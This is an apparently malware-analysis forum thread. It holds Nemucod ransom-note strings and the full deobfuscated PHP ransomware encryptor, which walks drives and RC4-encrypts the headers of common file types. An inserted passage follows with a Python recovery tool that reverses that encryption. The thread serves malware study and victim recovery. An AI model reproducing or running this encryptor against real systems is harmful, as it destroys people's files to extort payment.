Malware collection

Forum for analysis and discussion about malware.
ikolor
Posts: 307
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Malware collection

Post by ikolor » Wed Jul 29, 2015 12:58 pm

https://www.virustotal.com/en/file/a7ef ... /analysis/

There is a collection of malware code. Above is one scan of these samples.

ikolor
Posts: 307
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sun Aug 02, 2015 3:36 pm


ikolor
Posts: 307
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Fri Aug 14, 2015 7:05 pm


ikolor
Posts: 307
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Mon Nov 14, 2016 7:48 pm


heart888
Posts: 18
Joined: Tue Mar 01, 2016 11:04 pm

Re: Malware collection

Post by heart888 » Sun Nov 20, 2016 11:58 pm


ikolor
Posts: 307
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Fri Dec 09, 2016 4:26 pm


xors
Posts: 159
Joined: Mon May 23, 2016 2:01 am

Re: Malware collection

Post by xors » Fri Dec 09, 2016 5:57 pm

Malware. Not sure which one.
@xorsthingsv2

xors
Posts: 159
Joined: Mon May 23, 2016 2:01 am

Nemucod Ransomware

Post by xors » Mon Dec 12, 2016 9:45 pm

Hello all,

The dropper is a .wsf file. The dropper downloads two files, php4ts.dll and a file which will run a PHP file (a.php). It looks like the PHP file is doing the encryption. Some strings:

Code:

- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.

@xorsthingsv2

Antelox
Posts: 239
Joined: Sun Mar 21, 2010 10:38 pm

Re: Nemucod Ransomware

Post by Antelox » Tue Dec 13, 2016 7:32 am

xors wrote:Hello all,

The dropper is a .wsf file. The dropper downloads two files, php4ts.dll and a file which will run a PHP file (a.php). It looks like the PHP file is doing the encryption. Some strings:

Code:

- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.

It's the last Nemucod ransomware PHP variant, the one which uses RC4 encryption; the deobfuscated script is below:

Code:

<?php set_time_limit(0);
ini_set("display_errors", "Off");
for ($i = 67;$i <= 90;$i++) if (is_dir(chr($i) . ":")) Tree(chr($i) . ":");
function Tree($p) {
    $s = chr(92);
    $k = base64_decode("MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs");
    $a = "e";
    if (preg_match("/" . $s . $s . "(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i", $p) || preg_match("/recycle/i", $p)) return;
    $dp = opendir($p);
    if ($dp === false) return;
    while ($o = readdir($dp)) if ($o != "." && $o != "..") {
        if (is_dir($p . $s . $o)) {
            Tree($p . $s . $o);
        } elseif ($a == "e" && preg_match("/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i", $o) || $a == "d" && preg_match("/[.](crypted)$/i", $o)) {
            chmod($p . $s . $o, 0777);
            $fp = fopen($p . $s . $o, "r+");
            if ($fp !== false) {
                $b = fread($fp, 2048);
                $z = array();
                for ($i = 0;$i < 256;$i++) $z[$i] = $i;
                $j = 0;
                for ($i = 0;$i < 256;$i++) {
                    $j = ($j + $z[$i] + ord($k[$i % strlen($k) ])) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                }
                $i = 0;
                $j = 0;
                $c = "";
                for ($y = 0;$y < strlen($b);$y++) {
                    $i = ($i + 1) % 256;
                    $j = ($j + $z[$i]) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                    $c.= $b[$y] ^ chr($z[($z[$i] + $z[$j]) % 256]);
                }
                fseek($fp, 0);
                fwrite($fp, $c);
                fclose($fp);
                if ($a == "e") {
                    rename($p . $s . $o, $p . $s . $o . ".crypted");
                } else {
                    rename($p . $s . $o, preg_replace("/[.]crypted$/", "", $p . $s . $o));
                }
            }
        }
    }
    closedir($dp);
}
BR,

Antelox
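The ransom note above claims "strong RSA-1024", but the deobfuscated script only runs RC4 over the first 2048 bytes of each file (fread($fp, 2048)) with a key hardcoded in the script, so files from this sample can be recovered without paying. The Python below is an added recovery example, not code from the thread or from the malware: it reimplements the script's RC4 loops, undoes the damage in place and strips the .crypted suffix. NEMUCOD_KEY is the base64 value quoted in the script above; for any other sample the key must be taken from that sample's own a.php, and the 3000-byte "victim" file in the demo is constructed here.

```python
import base64
import os
import tempfile
from pathlib import Path

# Key and block length taken from the deobfuscated script quoted above.
NEMUCOD_KEY = base64.b64decode("MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs")
HEADER_LEN = 2048  # the script only ever touches fread($fp, 2048) bytes


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA), the same loops the PHP script runs."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def recover_file(path: Path, key: bytes = NEMUCOD_KEY) -> Path:
    """Undo the encryption in place: RC4 the first 2048 bytes again, then drop .crypted."""
    if path.suffix != ".crypted":
        raise ValueError(f"{path} does not carry the .crypted suffix")
    with open(path, "r+b") as fp:
        head = fp.read(HEADER_LEN)  # shorter files yield fewer bytes, exactly like fread()
        fp.seek(0)
        fp.write(rc4(key, head))  # RC4 is symmetric, so the same keystream undoes the XOR
    restored = path.with_suffix("")  # report.docx.crypted -> report.docx
    os.replace(path, restored)
    return restored


def round_trip_demo() -> tuple:
    """Constructed 3000-byte 'victim' file: damage it the way the script does, then recover it."""
    plain = bytes(range(256)) * 12  # constructed sample content, not from the page
    with tempfile.TemporaryDirectory() as d:
        victim = Path(d) / "report.docx.crypted"
        victim.write_bytes(rc4(NEMUCOD_KEY, plain[:HEADER_LEN]) + plain[HEADER_LEN:])
        restored = recover_file(victim)
        return restored.name, restored.read_bytes() == plain
```

Run recover_file() over every *.crypted path found by the same directory walk the script uses; anything beyond the first 2048 bytes was never touched, so only the header needs the pass.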

ikolor
Posts: 307
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Wed Dec 21, 2016 7:29 pm

